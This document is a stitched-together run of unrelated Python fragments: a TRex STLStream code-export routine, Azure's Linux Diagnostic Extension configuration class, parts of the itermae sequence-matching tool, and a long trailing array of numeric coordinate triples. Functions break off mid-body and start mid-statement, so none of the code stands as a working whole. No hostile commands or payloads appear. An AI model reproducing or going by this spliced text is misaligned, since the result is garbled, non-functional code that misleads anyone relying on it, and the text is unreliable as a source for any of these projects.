if default_STLStream.fields['enabled'] != self.fields['enabled']:
stream_params_list.append('enabled = %s' % self.fields['enabled'])
if default_STLStream.fields['self_start'] != self.fields['self_start']:
stream_params_list.append('self_start = %s' % self.fields['self_start'])
if default_STLStream.fields['start_paused'] != self.fields['start_paused']:
stream_params_list.append('start_paused = %s' % self.fields['start_paused'])
if default_STLStream.fields['isg'] != self.fields['isg']:
stream_params_list.append('isg = %s' % self.fields['isg'])
if default_STLStream.fields['flow_stats'] != self.fields['flow_stats']:
if 'rule_type' in self.fields['flow_stats']:
stream_params_list.append('flow_stats = %s(%s)' % ('STLFlowStats' if self.fields['flow_stats']['rule_type'] == 'stats' else 'STLFlowLatencyStats', self.fields['flow_stats']['stream_id']))
if default_STLStream.next != self.next:
stream_params_list.append('next = %s' % STLStream.__add_quotes(self.next))
if default_STLStream.id != self.id:
stream_params_list.append('stream_id = %s' % self.id)
if default_STLStream.fields['action_count'] != self.fields['action_count']:
stream_params_list.append('action_count = %s' % self.fields['action_count'])
if 'random_seed' in self.fields:
stream_params_list.append('random_seed = %s' % self.fields.get('random_seed', 0))
if default_STLStream.fields['core_id'] != self.fields['core_id']:
stream_params_list.append('core_id = %s' % self.fields['core_id'])
stream_params_list.append('mac_src_override_by_pkt = %s' % bool(self.fields['flags'] & 1))
stream_params_list.append('mac_dst_override_mode = %s' % (self.fields['flags'] >> 1 & 3))
if self.is_dummy():
stream_params_list.append('dummy_stream = True')
mode_args = ''
for key, value in self.fields['mode'].items():
if key not in ('rate', 'type'):
mode_args += '%s = %s, ' % (key, value)
mode_args += '%s = %s' % (self.fields['mode']['rate']['type'], self.fields['mode']['rate']['value'])
if self.mode_desc == STLTXCont.__str__():
stream_params_list.append('mode = STLTXCont(%s)' % mode_args)
elif self.mode_desc == STLTXSingleBurst().__str__():
stream_params_list.append('mode = STLTXSingleBurst(%s)' % mode_args)
elif self.mode_desc == STLTXMultiBurst().__str__():
stream_params_list.append('mode = STLTXMultiBurst(%s)' % mode_args)
else:
raise TRexError('Could not determine mode: %s' % self.mode_desc)
stream = "stream = STLStream(" + ',\n '.join(stream_params_list) + ')'
layer.hide_defaults() # remove fields with default values
imports_arr = []
layers_commands = []
# remove checksums, add imports if needed
while layer:
layer_class = layer.__class__.__name__
if layer_class not in vars(scapy.layers.all): # custom import
found_import = False
for module_path, module in sys.modules.items():
if not module_path.startswith(('scapy.layers', 'scapy.contrib')):
continue
import_string = 'from %s import %s' % (module_path, layer_class)
if import_string in imports_arr: # already present in extra imports
found_import = True
break
if hasattr(module, layer_class): # add as extra import
imports_arr.append(import_string)
found_import = True
break
if not found_import:
raise TRexError('Could not determine import of layer %s' % layer.name)
payload = layer.payload
layer.remove_payload()
if isinstance(layer, Raw):
payload_data = bytes(layer)
if payload_data == payload_data[0:1] * len(payload_data): # compact form Raw('x' * 100) etc.
layer_command = '%s * %s)' % (Raw(payload_data[0:1]).command().rstrip(')'), len(payload_data))
else:
layer_command = layer.command()
layers_commands.append(layer_command)
else:
layers_commands.append(layer.command())
layer = payload
imports = '\n'.join(imports_arr)
packet_code = 'packet = (' + (' / \n ').join(layers_commands) + ')'
if imports:
return '\n'.join([imports, packet_code, vm_code, stream])
return '\n'.join([packet_code, vm_code, stream])
# add quoted for string, or leave as is if other type
@staticmethod
def __add_quotes(arg):
if type(arg) is str:
return "'%s'" % arg
return arg
# used to replace non-printable characters with hex
@staticmethod
def __replchars_to_hex(match):
return
# Diagnostic/lad_config_all.py
#!/usr/bin/env python
#
# Azure Linux extension
#
# Linux Azure Diagnostic Extension (Current version is specified in manifest.xml)
# Copyright (c) Microsoft Corporation
# All rights reserved.
# MIT License
# Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
# documentation files (the ""Software""), to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all copies or substantial portions of the
# Software.
# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS
# OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
# OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
import os
import traceback
import xml.etree.ElementTree as ET
import Providers.Builtin as BuiltIn
import Utils.ProviderUtil as ProvUtil
import Utils.LadDiagnosticUtil as LadUtil
import Utils.XmlUtil as XmlUtil
import Utils.mdsd_xml_templates as mxt
import telegraf_utils.telegraf_config_handler as telhandler
import metrics_ext_utils.metrics_constants as metrics_constants
import metrics_ext_utils.metrics_ext_handler as me_handler
from Utils.lad_exceptions import LadLoggingConfigException, LadPerfCfgConfigException
from Utils.lad_logging_config import LadLoggingConfig, copy_source_mdsdevent_eh_url_elems
from Utils.misc_helpers import get_storage_endpoints_with_account, escape_nonalphanumerics
class LadConfigAll:
"""
A class to generate configs for all 3 core components of LAD: mdsd, omsagent (fluentd), and syslog
(rsyslog or syslog-ng) based on LAD's JSON extension settings.
The mdsd XML config file generated will be /var/lib/waagent/Microsoft. ...-x.y.zzzz/xmlCfg.xml (hard-coded).
Other config files whose contents are generated by this class are as follows:
- /etc/opt/microsoft/omsagent/LAD/conf/omsagent.d/syslog.conf : fluentd's syslog source config
- /etc/opt/microsoft/omsagent/LAD/conf/omsagent.d/tail.conf : fluentd's tail source config (fileLogs)
- /etc/opt/microsoft/omsagent/LAD/conf/omsagent.d/z_out_mdsd.conf : fluentd's out_mdsd out plugin config
- /etc/rsyslog.conf or /etc/rsyslog.d/95-omsagent.conf: rsyslog config for LAD's syslog settings
The content should be appended to the corresponding file, not overwritten. After that, the file should be
processed so that the '%SYSLOG_PORT%' pattern is replaced with the assigned TCP port number.
- /etc/syslog-ng.conf: syslog-ng config for LAD's syslog settings. The content should be appended, not overwritten.
"""
_default_perf_cfgs = [
{"query": "SELECT PercentAvailableMemory, AvailableMemory, UsedMemory, PercentUsedSwap "
"FROM SCX_MemoryStatisticalInformation",
"table": "LinuxMemory"},
{"query": "SELECT PercentProcessorTime, PercentIOWaitTime, PercentIdleTime "
"FROM SCX_ProcessorStatisticalInformation WHERE Name='_TOTAL'",
"table": "LinuxCpu"},
{"query": "SELECT AverageWriteTime,AverageReadTime,ReadBytesPerSecond,WriteBytesPerSecond "
"FROM SCX_DiskDriveStatisticalInformation WHERE Name='_TOTAL'",
"table": "LinuxDisk"}
]
def __init__(self, ext_settings, ext_dir, waagent_dir, deployment_id,
fetch_uuid, encrypt_string, logger_log, logger_error):
"""
Constructor.
:param ext_settings: A LadExtSettings (in Utils/lad_ext_settings.py) obj wrapping the Json extension settings.
:param ext_dir: Extension directory (e.g., /var/lib/waagent/Microsoft.OSTCExtensions.LinuxDiagnostic-2.3.xxxx)
:param waagent_dir: WAAgent directory (e.g., /var/lib/waagent)
:param deployment_id: Deployment ID string (or None) that should be obtained & passed by the caller
from waagent's HostingEnvironmentCfg.xml.
:param fetch_uuid: A function which fetches the UUID for the VM
:param encrypt_string: A function which encrypts a string, given a cert_path
:param logger_log: Normal logging function (e.g., hutil.log) that takes only one param for the logged msg.
:param logger_error: Error logging function (e.g., hutil.error) that takes only one param for the logged msg.
"""
self._ext_settings = ext_settings
self._ext_dir = ext_dir
self._waagent_dir = waagent_dir
self._deployment_id = deployment_id
self._fetch_uuid = fetch_uuid
self._encrypt_secret = encrypt_string
self._logger_log = logger_log
self._logger_error = logger_error
self._telegraf_me_url = metrics_constants.lad_metrics_extension_influx_udp_url
self._telegraf_mdsd_url = metrics_constants.telegraf_influx_url
# Generated logging configs place holders
self._fluentd_syslog_src_config = None
self._fluentd_tail_src_config = None
self._fluentd_out_mdsd_config = None
self._rsyslog_config = None
self._syslog_ng_config = None
self._telegraf_config = None
self._telegraf_namespaces = None
self._mdsd_config_xml_tree = ET.ElementTree(ET.fromstring(mxt.entire_xml_cfg_tmpl))
self._sink_configs = LadUtil.SinkConfiguration()
self._sink_configs.insert_from_config(self._ext_settings.read_protected_config('sinksConfig'))
# Reading the AzMonSink info from the public config.
self._sink_configs_public = LadUtil.SinkConfiguration()
self._sink_configs_public.insert_from_config(self._ext_settings.read_public_config('sinksConfig'))
# If we decide to also read sinksConfig from ladCfg, do it first, so that private settings override
# Get encryption settings
handlerSettings = ext_settings.get_handler_settings()
if handlerSettings['protectedSettings'] is None:
errorMsg = "Settings did not contain protectedSettings. For information on protected settings, " \
"visit https://docs.microsoft.com/en-us/azure/virtual-machines/extensions/diagnostics-linux#protected-settings."
self._logger_error(errorMsg)
raise LadLoggingConfigException(errorMsg)
if handlerSettings['protectedSettingsCertThumbprint'] is None:
errorMsg = "Settings did not contain protectedSettingsCertThumbprint. For information on protected settings, " \
"visit https://docs.microsoft.com/en-us/azure/virtual-machines/extensions/diagnostics-linux#protected-settings."
self._logger_error(errorMsg)
raise LadLoggingConfigException(errorMsg)
thumbprint = handlerSettings['protectedSettingsCertThumbprint']
self._cert_path = os.path.join(waagent_dir, thumbprint + '.crt')
self._pkey_path = os.path.join(waagent_dir, thumbprint + '.prv')
def _ladCfg(self):
return self._ext_settings.read_public_config('ladCfg')
@staticmethod
def _wad_table_name(interval):
"""
Build the name of the WAD metrics table for a given aggregation interval
:param str interval: String representation of aggregation interval
:return: table name
:rtype: str
"""
return 'WADMetrics{0}P10DV2S'.format(interval)
def _add_element_from_string(self, path, xml_string, add_only_once=True):
"""
Add an XML fragment to the mdsd config document in accordance with path
:param str path: Where to add the fragment
:param str xml_string: A string containing the XML element to add
:param bool add_only_once: Indicates whether to perform the addition only to the first match of the path.
"""
XmlUtil.addElement(xml=self._mdsd_config_xml_tree, path=path, el=ET.fromstring(xml_string),
addOnlyOnce=add_only_once)
def _add_element_from_element(self, path, xml_elem, add_only_once=True):
"""
Add an XML fragment to the mdsd config document in accordance with path
:param str path: Where to add the fragment
:param ElementTree xml_elem: An ElementTree object XML fragment that should be added to the path.
:param bool add_only_once: Indicates whether to perform the addition only to the first match of the path.
"""
XmlUtil.addElement(xml=self._mdsd_config_xml_tree, path=path, el=xml_elem, addOnlyOnce=add_only_once)
def _add_derived_event(self, interval, source, event_name, store_type, add_lad_query=False):
"""
Add a <DerivedEvent> element to the configuration
:param str interval: Interval at which this DerivedEvent should be run
:param str source: Local table from which this DerivedEvent should pull
:param str event_name: Destination table to which this DerivedEvent should push
:param str store_type: The storage type of the destination table, e.g. Local, Central, JsonBlob
:param bool add_lad_query: True if a <LadQuery> subelement should be added to this <DerivedEvent> element
"""
derived_event = mxt.derived_event.format(interval=interval, source=source, target=event_name, type=store_type)
element = ET.fromstring(derived_event)
if add_lad_query:
XmlUtil.addElement(element, ".", ET.fromstring(mxt.lad_query))
self._add_element_from_element('Events/DerivedEvents', element)
def _add_obo_field(self, name, value):
"""
Add an <OboDirectPartitionField> element to the <Management> element.
:param name: Name of the field
:param value: Value for the field
"""
self._add_element_from_string('Management', mxt.obo_field.format(name=name, value=value))
def _update_metric_collection_settings(self, ladCfg, namespaces):
"""
Update mdsd_config_xml_tree for Azure Portal metric collection. This method builds the aggregation
queries that summarize the ingested data and push the results to the WADMetrics table.
:param ladCfg: ladCfg object from extension config
:param namespaces: list of telegraf plugins sources obtained after parsing lad metrics config
:return: None
"""
# Aggregation is done by <LADQuery> within a <DerivedEvent>. If there are no alternate sinks, the DerivedQuery
# can send output directly to the WAD metrics table. If there *are* alternate sinks, have the LADQuery send
# output to a new local table, then arrange for additional derived queries to pull from that.
intervals = LadUtil.getAggregationPeriodsFromLadCfg(ladCfg)
sinks = LadUtil.getFeatureWideSinksFromLadCfg(ladCfg, 'performanceCounters')
for plugin in namespaces:
lad_specific_storage_plugin = "storage-" + plugin
for aggregation_interval in intervals:
if sinks:
local_table_name = ProvUtil.MakeUniqueEventName('aggregationLocal')
self._add_derived_event(aggregation_interval, lad_specific_storage_plugin,
local_table_name,
'Local', add_lad_query=True)
self._handle_alternate_sinks(aggregation_interval, sinks, local_table_name)
else:
self._add_derived_event(aggregation_interval, lad_specific_storage_plugin,
LadConfigAll._wad_table_name(aggregation_interval),
'Central', add_lad_query=True)
def _handle_alternate_sinks(self, interval, sinks, source):
"""
Update the XML config to accommodate alternate data sinks. Start by pumping the data from the local source to
the actual wad table; then run through the sinks and add annotations or additional DerivedEvents as needed.
:param str interval: Aggregation interval
:param [str] sinks: List of alternate destinations
:param str source: Name of local table from which data is to be pumped
:return:
"""
self._add_derived_event(interval, source, LadConfigAll._wad_table_name(interval), 'Central')
for name in sinks:
sink = self._sink_configs.get_sink_by_name(name)
if sink is None:
self._logger_log("Ignoring sink '{0}' for which no definition was found".format(name))
elif sink['type'] == 'EventHub':
if 'sasURL' in sink:
self._add_streaming_annotation(source, sink['sasURL'])
else:
self._logger_error("Ignoring EventHub sink '{0}': no 'sasURL' was supplied".format(name))
elif sink['type'] == 'JsonBlob':
self._add_derived_event(interval, source, name, 'JsonBlob')
else:
self._logger_log("Ignoring sink '{0}': unknown type '{1}'".format(name, sink['type']))
def _add_streaming_annotation(self, sink_name, sas_url):
"""
Helper to add an EventStreamingAnnotation element for the given sink_name and sas_url
:param str sink_name: Name of the EventHub sink name for the SAS URL
:param str sas_url: Raw SAS URL string for the EventHub sink
"""
self._add_element_from_string('EventStreamingAnnotations',
mxt.per_eh_url_tmpl.format(eh_name=sink_name,
key_path=self._pkey_path,
enc_eh_url=self._encrypt_secret_with_cert(sas_url)))
maximum_number_of_outputs
if len(args_copy.output_description) == 1:
args_copy.output_description = args_copy.output_description * maximum_number_of_outputs
if not ( len(args_copy.output_id) == len(args_copy.output_seq) ==
len(args_copy.output_filter) == len(args_copy.output_description) ):
raise ValueError("The output IDs, seqs, descriptions, and "
"filters are of unequal sizes. Make them equal, or only "
"define one each and it will be reused across all."+
repr(( len(args_copy.output_id), len(args_copy.output_seq),
len(args_copy.output_filter), len(args_copy.output_description) )) )
i = 0
for idz, seqz, filterz, description in zip(args_copy.output_id, args_copy.output_seq, args_copy.output_filter, args_copy.output_description) :
this_name = 'untitled_output_'+str(i)
i += 1
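# Each id/seq/filter/description string is compiled once here as a Python
# expression; presumably it is evaluated later for every read with the named
# match groups in scope (hence the hint below about quoting literal parts).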
try:
self.outputs_array.append( {
'name': this_name,
'filter': [ filterz, compile(filterz,'<string>','eval',optimize=2) ],
'id': [ idz, compile(idz,'<string>','eval',optimize=2) ],
'seq': [ seqz, compile(seqz,'<string>','eval',optimize=2) ] ,
'description':[ description, compile(description,'<string>','eval',optimize=2) ]
})
except Exception as error:
raise ValueError(repr(error)+" : "
"Either the supplied 'filter', 'id', 'seq', "
"or 'description' expression for a match group does "
"not look like a python expression - are all "
"non-group-name parts in quotes? Are group-names and "
"other parts connected with + signs?")
# Passing through the rest, defaults should be set in argparse defs
if args_copy.input is not None:
self.input = args_copy.input
if args_copy.input_format is not None:
self.input_format = args_copy.input_format
if args_copy.gzipped is not None:
self.gzipped = args_copy.gzipped
if args_copy.output is not None:
self.output = args_copy.output
if args_copy.output_format is not None:
self.output_format = args_copy.output_format
if args_copy.failed is not None:
self.failed = args_copy.failed
if args_copy.report is not None:
self.report = args_copy.report
def summary(self):
return_string = ('Configured as:'+
'\n input from: '+self.input+
'\n input format: '+self.input_format+
'\n is it gzipped?: '+str(self.gzipped)+
'\n output APPENDING to: '+self.output+
'\n output format is: '+self.output_format+
'\n failed being APPENDED to file: '+str(self.failed)+
'\n report being APPENDED to file: '+str(self.report)+
'\n with verbosity set at: '+str(self.verbosity)+
'\n doing these matches:')
for each in self.matches_array:
return_string += '\n - input: '+each['input']
return_string += '\n regex: '+str(each['regex'])
return_string += '\n writing these outputs:'
for each in self.outputs_array:
return_string += '\n - id: '+str(each['id'][0])
return_string += '\n description: '+str(each['description'][0])
return_string += '\n seq: '+str(each['seq'][0])
return_string += '\n filter: '+str(each['filter'][0])
return return_string
def reader(self):
"""This reads inputs, calls the `chop` method on each one, and sorts
it off to outputs. So this is called by the main function, and is
mostly about handling the I/O and handing it to the `chop` function.
Thus, this depends on the `Configuration` class being properly
configured with all the appropriate values.
"""
# Input
self.get_input_seqs()
# Outputs - passed records, failed records, report file
self.output_fh = self.open_output_fh(self.output)
self.report_fh = self.open_output_fh(self.report)
self.failed_fh = self.open_output_fh(self.failed)
# Do the chop-ing...
for each_seq in self.input_seqs:
# CAUTION
# The below is a munge.
# According to https://github.com/biopython/biopython/issues/398 ,
# BioPython mimics an old tool's weird behavior by outputting the
# ID in the description field. The fix for it relies on comparing
# against a white-space 'split' to remove the ID if it's in the description.
# That breaks if the ID has been modified, so the ID is stripped from the
# description right after parsing.
each_seq.description = re.sub(str(each_seq.id),"",
each_seq.description).lstrip()
seq_holder = SeqHolder(each_seq,configuration=self)
seq_holder.chop()
self.close_fhs()
class MatchScores:
"""This is a little class just to hold the three scores under attributes,
such that they're easier to type for writing filters. Also, it flattens
them for debug report printing.
:param substitutions: number to store under `.substitutions` attribute
:type substitutions: int
:param insertions: number to store under `.insertions` attribute
:type insertions: int
:param deletions: number to store under `.deletions` attribute
:type deletions: int
"""
def __init__(self, substitutions, insertions, deletions):
self.substitutions = substitutions
self.insertions = insertions
self.deletions = deletions
def flatten(self):
"""Flatten this object for printing debug reports.
:return: string in form substitutions_insertions_deletions
:rtype: str
"""
return str(self.substitutions)+"_"+str(self.insertions)+"_"+\
str(self.deletions)
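# For example (a sketch): MatchScores(2, 0, 1).flatten() returns "2_0_1",
# i.e. the substitution, insertion, and deletion counts for one match
# operation, joined for a debug report line.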
class GroupStats:
"""Object for conveniently holding parameters from the match, so that
they're easier to type for filters/output specification, and to flatten
for debug printing.
:param start: number to store under `.start` attribute
:type start: int
:param end: number to store under `.end` attribute
:type end: int
:param length: number to store under `.length` attribute
:type length: int
:param quality: list of numbers to store under `.quality` attribute
:type quality: list of int
:param quality_string: string of the quality array under PHRED encodings
:type quality_string: string
"""
def __init__(self, start, end, seq, quality):
self.start = start
self.end = end
self.length = self.end - self.start
self.seq = seq
self.quality = quality
self.quality_string = phred_number_array_to_joined_string(quality)
def flatten(self):
"""Flatten this object for printing debug reports, but just for
the start, end, length attributes. Not quality.
:return: string in form start_end_length
:rtype: str
"""
return str(self.start)+"_"+str(self.end)+"_"+str(self.length)
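    # For example (a sketch): a group matched at span (5, 12) flattens to
    # "5_12_7", since `.length` is derived as end - start.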
def __eq__(self,other):
"""Attention! This is a hack to allow for using the group's name
(ie 'barcode') instead of accessing the '.seq' method.
"""
return str(self.seq.seq) == other
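    # A consequence of the hack above (a sketch, with a hypothetical group
    # name): a filter expression like
    #   barcode == 'ATCGA'
    # compares the matched group's sequence string directly, instead of
    # requiring str(barcode.seq.seq) == 'ATCGA'.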
class SeqHolder:
"""This is the main holder of sequences, and has methods for doing matching,
building contexts, filtering, etcetra. Basically there is one of these
initialized per input, then each operation is done with this object, then
it generates the appropriate outputs and `chop` actually writes them.
Used in `chop`.
The `.seqs` attribute holds the sequences accessed by the matching,
initialized with the `input_record` SeqRecord and a `dummyspacer` for
output formatting with a separator.
:param input_record: an input SeqRecord object
:type input_record: Bio.SeqRecord.SeqRecord
:param configuration: the whole program's Configuration object, with
appropriate file-handles opened up and defaults set
:type configuration: itermae.Configuration
# :raises [ErrorType]: [ErrorDescription]
# :return: [ReturnDescription]
# :rtype: [ReturnType]
"""
def __init__(self, input_record, configuration):
self.seqs = {
'dummyspacer': SeqRecord.SeqRecord(Seq.Seq("X"),id="dummyspacer"),
'input': input_record }
self.seqs['dummyspacer'].letter_annotations['phred_quality'] = [40]
self.configuration = configuration
# These two dicts hold the scores for each match operation (in order),
# and the start end length statistics for each matched group.
self.match_scores = {}
self.group_stats = {}
def apply_operation(self, match_id, input_group, regex):
"""This applies the given match to the `SeqHolder` object, and saves
how it did internally.
:param match_id: what name should we call this match? This is useful
for debugging reports and filtering only.
:type match_id: str
:param input_group: which input group to use, by name of the group
:type input_group: str
:param regex: the regular expression to apply, complete with named
groups to save for subsequent match operations
:type regex: regex compiled regular expression object
:return: self, this is just done so it can exit early if no valid input
:rtype: itermae.SeqHolder
"""
        # Try to find the input; if it's not here, record null scores and
        # return early.
        try:
            self.seqs[input_group]
        except KeyError:
            self.match_scores[match_id] = MatchScores(None,None,None)
            return self
if self.configuration.verbosity >= 3:
print("\n["+str(time.time())+"] : attempting to match : "+
str(regex)+" against "+self.seqs[input_group].seq,
file=sys.stderr)
# Here we execute the actual meat of the business.
# Note that the input is made uppercase!
fuzzy_match = regex.search( str(self.seqs[input_group].seq).upper() )
if self.configuration.verbosity >= 3:
print("\n["+str(time.time())+"] : match is : "+str(fuzzy_match),
file=sys.stderr)
try:
# This is making and storing an object for just accessing these
# numbers nicely in the arguments for forming outputs and filtering.
self.match_scores[match_id] = MatchScores(*fuzzy_match.fuzzy_counts)
# Then for each of the groups matched by the regex
for match_name in fuzzy_match.groupdict():
                # We stick into the holder a slice of the input seq, that is
                # the matched span of this matching group. So, extract.
self.seqs[match_name] = \
self.seqs[input_group][slice(*fuzzy_match.span(match_name))]
                #self.seqs[match_name].description = ""
                # The disabled line above was an earlier fix for the bug where
                # the ID is stuck into the description and gets unpacked on
                # forming outputs; that is now handled right after parsing.
# Then we record the start, end, and length of the matched span
self.group_stats[match_name] = \
GroupStats(*fuzzy_match.span(match_name),
seq=self.seqs[match_name],
quality=self.seqs[match_name].letter_annotations['phred_quality']
)
        except (AttributeError, KeyError):
            # No match was found (fuzzy_match is None), or a group lacked
            # phred_quality annotations, so record null scores for this match.
            self.match_scores[match_id] = MatchScores(None,None,None)
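    # A minimal usage sketch for apply_operation (hypothetical names),
    # assuming a `regex`-module pattern with fuzzy matching and named groups:
    #   import regex
    #   rx = regex.compile(r'(?P<barcode>[ATCGN]{5}){e<=1}')
    #   holder = SeqHolder(record, configuration=config)
    #   holder.apply_operation('match_0', 'input', rx)
    #   holder.group_stats['barcode'].flatten()   # e.g. '0_5_5'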
def build_context(self):
"""This unpacks group match stats/scores into an environment that
the filter can then use to ... well ... filter.
"""
        # This is context for the filters, so it operates on plain values,
        # as opposed to the context_seq, which operates on SeqRecords
self.context_filter = { **self.group_stats , **self.match_scores }
        # Then unpack
[-0.79546369024868, 0.05991487568396, -0.57235298198835],
[-0.69209820344694, 0.05991487568396, -0.57235298198835],
[-0.58120945840524, 0.05712058778268, -0.58120945840524],
[-0.45548262743559, 0.05474066986092, -0.59925804242534],
[-1.00000000000000, 0.22034867784306, -0.61017433892153],
[-0.89849390365871, 0.21353103704236, -0.59938063492158],
[-0.80821469636381, 0.21200732961882, -0.59557793689121],
[-0.71565649846207, 0.21353103704236, -0.59938063492158],
[-0.61017433892153, 0.22034867784306, -0.61017433892153],
[-1.00000000000000, 0.37445219127856, -0.62719310134571],
[-0.90533315725650, 0.36192227945240, -0.62778228539838],
[-0.82880683679752, 0.36192227945240, -0.62778228539838],
[-0.74725908993286, 0.37445219127856, -0.62719310134571],
[-1.00000000000000, 0.51226141841950, -0.65107787413874],
[-0.91826859853484, 0.50546430717196, -0.66892711010229],
[-0.86118354428076, 0.51226141841950, -0.65107787413874],
[-1.00000000000000, 0.62972921442352, -0.68283080625434],
[-0.94689840816918, 0.62972921442352, -0.68283080625434],
[-1.00000000000000, 0.72367932928324, -0.72367932928324],
[-1.00000000000000, -1.00000000000000, -0.58850483431866],
[-0.94367298086688, -1.00000000000000, -0.53977863434066],
[-0.85467813358830, -1.00000000000000, -0.50223646595824],
[-0.73801547866742, -1.00000000000000, -0.47450138980813],
[-0.59925804242534, -1.00000000000000, -0.45548262743559],
[-0.44439033087540, -1.00000000000000, -0.44439033087540],
[-0.27962686227842, -1.00000000000000, -0.44074627544316],
[-0.11121933824920, -1.00000000000000, -0.44439033087540],
[0.05474066986092, -1.00000000000000, -0.45548262743559],
[0.21251686847555, -1.00000000000000, -0.47450138980813],
[0.35691459954653, -1.00000000000000, -0.50223646595824],
[0.48345161520754, -1.00000000000000, -0.53977863434066],
[0.58850483431866, -1.00000000000000, -0.58850483431866],
[-1.00000000000000, -0.94367298086688, -0.53977863434066],
[-0.91533769804486, -0.91533769804486, -0.52168268319682],
[-0.82197902687780, -0.90271908968347, -0.47858570939270],
[-0.70620673063170, -0.89619431421031, -0.44889894801261],
[-0.57106333491179, -0.89275319595316, -0.43064547863352],
[-0.42195032631194, -0.89124316588241, -0.42195032631194],
[-0.26485618149372, -0.89124316588241, -0.42195032631194],
[-0.10553799050153, -0.89275319595316, -0.43064547863352],
[0.05129999285461, -0.89619431421031, -0.44889894801261],
[0.20328382595397, -0.90271908968347, -0.47858570939270],
[0.35235807928655, -0.91533769804486, -0.52168268319682],
[0.48345161520754, -0.94367298086688, -0.53977863434066],
[-1.00000000000000, -0.85467813358830, -0.50223646595824],
[-0.90271908968347, -0.82197902687780, -0.47858570939270],
[-0.80237272611754, -0.80237272611754, -0.44624189631944],
[-0.68465203917083, -0.79077416730400, -0.42330908651523],
[-0.55093034546477, -0.78460952663812, -0.41008062239189],
[-0.40577573935925, -0.78267278192224, -0.40577573935925],
[-0.25437950550522, -0.78460952663812, -0.41008062239189],
[-0.10126470700993, -0.79077416730400, -0.42330908651523],
[0.05098734855452, -0.80237272611754, -0.44624189631944],
[0.20328382595397, -0.82197902687780, -0.47858570939270],
[0.35691459954653, -0.85467813358830, -0.50223646595824],
[-1.00000000000000, -0.73801547866742, -0.47450138980813],
[-0.89619431421031, -0.70620673063170, -0.44889894801261],
[-0.79077416730400, -0.68465203917083, -0.42330908651523],
[-0.67157579256611, -0.67157579256611, -0.40609844374786],
[-0.53927929004885, -0.66542091268526, -0.39764989863294],
[-0.39764989863294, -0.66542091268526, -0.39764989863294],
[-0.25074997111992, -0.67157579256611, -0.40609844374786],
[-0.10126470700993, -0.68465203917083, -0.42330908651523],
[0.05129999285461, -0.70620673063170, -0.44889894801261],
[0.21251686847555, -0.73801547866742, -0.47450138980813],
[-1.00000000000000, -0.59925804242534, -0.45548262743559],
[-0.89275319595316, -0.57106333491179, -0.43064547863352],
[-0.78460952663812, -0.55093034546477, -0.41008062239189],
[-0.66542091268526, -0.53927929004885, -0.39764989863294],
[-0.53548665674294, -0.53548665674294, -0.39354002977118],
[-0.39764989863294, -0.53927929004885, -0.39764989863294],
[-0.25437950550522, -0.55093034546477, -0.41008062239189],
[-0.10553799050153, -0.57106333491179, -0.43064547863352],
[0.05474066986092, -0.59925804242534, -0.45548262743559],
[-1.00000000000000, -0.44439033087540, -0.44439033087540],
[-0.89124316588241, -0.42195032631194, -0.42195032631194],
[-0.78267278192224, -0.40577573935925, -0.40577573935925],
[-0.66542091268526, -0.39764989863294, -0.39764989863294],
[-0.53927929004885, -0.39764989863294, -0.39764989863294],
[-0.40577573935925, -0.40577573935925, -0.40577573935925],
[-0.26485618149372, -0.42195032631194, -0.42195032631194],
[-0.11121933824920, -0.44439033087540, -0.44439033087540],
[-1.00000000000000, -0.27962686227842, -0.44074627544316],
[-0.89124316588241, -0.26485618149372, -0.42195032631194],
[-0.78460952663812, -0.25437950550522, -0.41008062239189],
[-0.67157579256611, -0.25074997111992, -0.40609844374786],
[-0.55093034546477, -0.25437950550522, -0.41008062239189],
[-0.42195032631194, -0.26485618149372, -0.42195032631194],
[-0.27962686227842, -0.27962686227842, -0.44074627544316],
[-1.00000000000000, -0.11121933824920, -0.44439033087540],
[-0.89275319595316, -0.10553799050153, -0.43064547863352],
[-0.79077416730400, -0.10126470700993, -0.42330908651523],
[-0.68465203917083, -0.10126470700993, -0.42330908651523],
[-0.57106333491179, -0.10553799050153, -0.43064547863352],
[-0.44439033087540, -0.11121933824920, -0.44439033087540],
[-1.00000000000000, 0.05474066986092, -0.45548262743559],
[-0.89619431421031, 0.05129999285461, -0.44889894801261],
[-0.80237272611754, 0.05098734855452, -0.44624189631944],
[-0.70620673063170, 0.05129999285461, -0.44889894801261],
[-0.59925804242534, 0.05474066986092, -0.45548262743559],
[-1.00000000000000, 0.21251686847555, -0.47450138980813],
[-0.90271908968347, 0.20328382595397, -0.47858570939270],
[-0.82197902687780, 0.20328382595397, -0.47858570939270],
[-0.73801547866742, 0.21251686847555, -0.47450138980813],
[-1.00000000000000, 0.35691459954653, -0.50223646595824],
[-0.91533769804486, 0.35235807928655, -0.52168268319682],
[-0.85467813358830, 0.35691459954653, -0.50223646595824],
[-1.00000000000000, 0.48345161520754, -0.53977863434066],
[-0.94367298086688, 0.48345161520754, -0.53977863434066],
[-1.00000000000000, 0.58850483431866, -0.58850483431866],
[-1.00000000000000, -1.00000000000000, -0.43441503691212],
[-0.94153338637932, -1.00000000000000, -0.37973175758212],
[-0.85055979016974, -1.00000000000000, -0.33819570282874],
[-0.73266516174362, -1.00000000000000, -0.30834740911645],
[-0.59392944953705, -1.00000000000000, -0.28907450090662],
[-0.44074627544316, -1.00000000000000, -0.27962686227842],
[-0.27962686227842, -1.00000000000000, -0.27962686227842],
[-0.11699604955632, -1.00000000000000, -0.28907450090662],
[0.04101257086006, -1.00000000000000, -0.30834740911645],
[0.18875549299847, -1.00000000000000, -0.33819570282874],
[0.32126514396144, -1.00000000000000, -0.37973175758212],
[0.43441503691212, -1.00000000000000, -0.43441503691212],
[-1.00000000000000, -0.94153338637932, -0.37973175758212],
[-0.91361325731751, -0.91361325731751, -0.35580977157487],
[-0.81822259638933, -0.90132394717945, -0.31409235901703],
[-0.70174749688164, -0.89515246800868, -0.28598097100158],
